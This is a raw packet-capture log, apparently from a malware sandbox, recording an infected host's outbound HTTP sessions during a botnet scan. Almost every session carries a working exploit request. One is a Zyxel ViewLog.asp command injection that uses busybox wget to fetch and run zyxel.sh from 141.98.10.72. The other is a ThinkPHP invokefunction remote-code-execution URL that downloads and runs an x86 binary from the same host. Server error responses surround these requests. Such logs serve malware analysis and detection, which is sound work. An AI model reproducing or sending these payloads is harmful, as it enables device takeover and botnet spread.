                                                      Feb 14, 2024 09:30:30.442542076 CET171INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 31 3a 30 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:31:01Auth Result: ????.


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      710192.168.2.155244662.29.115.28080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:30.590029001 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      711192.168.2.1551740119.29.120.22223
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:31.144556999 CET171INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 31 3a 30 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:31:02Auth Result: ????.


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      712192.168.2.153620688.99.168.21280
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:31.339859962 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:31.547741890 CET307INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:30:31 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      713192.168.2.154424088.198.38.7980
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:31.340101004 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:31.549338102 CET307INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:30:31 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      714192.168.2.155732895.101.253.21080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:31.536429882 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:31.733071089 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:30:31 GMT
                                                      Date: Wed, 14 Feb 2024 08:30:31 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 36 33 66 36 35 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 34 33 31 26 23 34 36 3b 33 30 38 65 34 65 64 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;863f655f&#46;1707899431&#46;308e4ede</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      715192.168.2.155608295.100.75.21380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:31.540514946 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:31.741523981 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:30:31 GMT
                                                      Date: Wed, 14 Feb 2024 08:30:31 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 61 37 61 37 62 35 63 26 23 34 36 3b 31 37 30 37 38 39 39 34 33 31 26 23 34 36 3b 34 63 39 66 64 38 37 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;aa7a7b5c&#46;1707899431&#46;4c9fd870</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      716192.168.2.154914695.100.100.7080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:31.545066118 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:31.750567913 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:30:31 GMT
                                                      Date: Wed, 14 Feb 2024 08:30:31 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 36 36 34 36 34 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 34 33 31 26 23 34 36 3b 33 34 34 33 35 32 32 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;4664645f&#46;1707899431&#46;34435223</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      717192.168.2.1551748119.29.120.22223
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:31.854316950 CET171INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 31 3a 30 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:31:02Auth Result: ????.


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      718192.168.2.153822894.178.243.748080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:32.597855091 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:33.873173952 CET21INHTTP/1.1
                                                      Data Raw:
                                                      Data Ascii:


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      719192.168.2.155580894.120.105.1128080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:32.600430965 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      720192.168.2.155775895.86.118.548080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:32.602845907 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      721192.168.2.153782431.145.136.578080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:32.612750053 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      722192.168.2.154321695.169.93.918080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:32.820368052 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:33.049107075 CET435INHTTP/1.1 406 Not Acceptable
                                                      Content-Type: text/html; charset=utf-8
                                                      X-Frame-Options: SAMEORIGIN
                                                      Content-Security-Policy: frame-ancestors 'none'
                                                      Content-Length: 116
                                                      X-Frame-Options: SAMEORIGIN
                                                      Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 36 20 4e 6f 74 20 41 63 63 65 70 74 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 36 20 4e 6f 74 20 41 63 63 65 70 74 61 62 6c 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><head><title>406 Not Acceptable</title></head><body><center><h1>406 Not Acceptable</h1></center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      723192.168.2.155356062.29.72.108080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:32.846084118 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      724192.168.2.153469094.123.248.1188080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:32.847465992 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      725192.168.2.153386895.86.118.98080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:32.851593018 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      726192.168.2.153874495.86.105.48080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:32.851880074 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      727192.168.2.153516885.222.64.908080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:32.873807907 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:33.132143974 CET388INHTTP/1.1 404 Not Found
                                                      Date: Wed, 14 Feb 2024 09:14:35 GMT
                                                      Server: DNVRS-Webs
                                                      Cache-Control: no-cache
                                                      Content-Length: 166
                                                      Content-Type: text/html
                                                      Connection: keep-alive
                                                      Keep-Alive: timeout=60, max=99
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      728192.168.2.154275494.182.205.1688080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:33.168400049 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      729192.168.2.153419285.239.242.2488080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:33.635446072 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:33.761769056 CET88INHTTP/1.0 400 Bad Request
                                                      Data Raw: 43 6c 69 65 6e 74 20 73 65 6e 74 20 61 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 74 6f 20 61 6e 20 48 54 54 50 53 20 73 65 72 76 65 72 2e 0a
                                                      Data Ascii: Client sent an HTTP request to an HTTPS server.


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      730192.168.2.154941262.4.28.2248080
                                                      TimestampBytes transferredDirectionData
